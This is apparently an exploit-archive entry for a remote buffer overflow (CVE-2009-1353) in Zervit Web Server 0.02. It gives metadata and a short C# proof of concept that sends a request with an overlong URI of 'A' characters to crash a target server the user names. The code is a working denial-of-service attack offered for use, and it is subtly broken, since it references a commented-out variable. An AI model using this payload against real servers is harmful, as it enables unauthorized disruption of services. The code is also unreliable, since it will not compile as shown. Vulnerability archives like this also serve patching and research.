Zervit Web Server 0.02 - Remote Buffer Overflow (PoC)

Author: e.wiZz!
type: dos
platform: windows
port: 
date_added: 2009-04-14  
date_updated:   
verified: 1  
codes: OSVDB-53768;CVE-2009-1353  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8447.txt  

####################  Zervit Webserver 0.02  Buffer Overflow   ############################


############### By:      e.wiZz!

###############Site:   www.balcansecurity.com


############### Found with ServMeNot (world's sexiest fuzzer :P )



In the wild...

########################################################################################

######Vend0r site: http://www.ohloh.net/projects/mereo


/* When requested uri isn't found,it goes to char tmp[255],
and later it is used to output,you need 256 chars to overflow (check source "http.c") */

using System;
using System.IO;
using System.Net;
using System.Text;

class whatsoever
{
    static void Main()
    {
        // StringBuilder sb = new StringBuilder();

        //byte[] buf = new byte[8192];

        Console.WriteLine("Enter site: (http://localhost)");
        string sajt = Console.ReadLine();
        string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        HttpWebRequest request = (HttpWebRequest)

            WebRequest.Create(sajt+uribad);

        HttpWebResponse response = (HttpWebResponse)
            request.GetResponse();
        // you shouldn't see response
        Console.WriteLine(sb.ToString());
    }
}

// milw0rm.com [2009-04-15]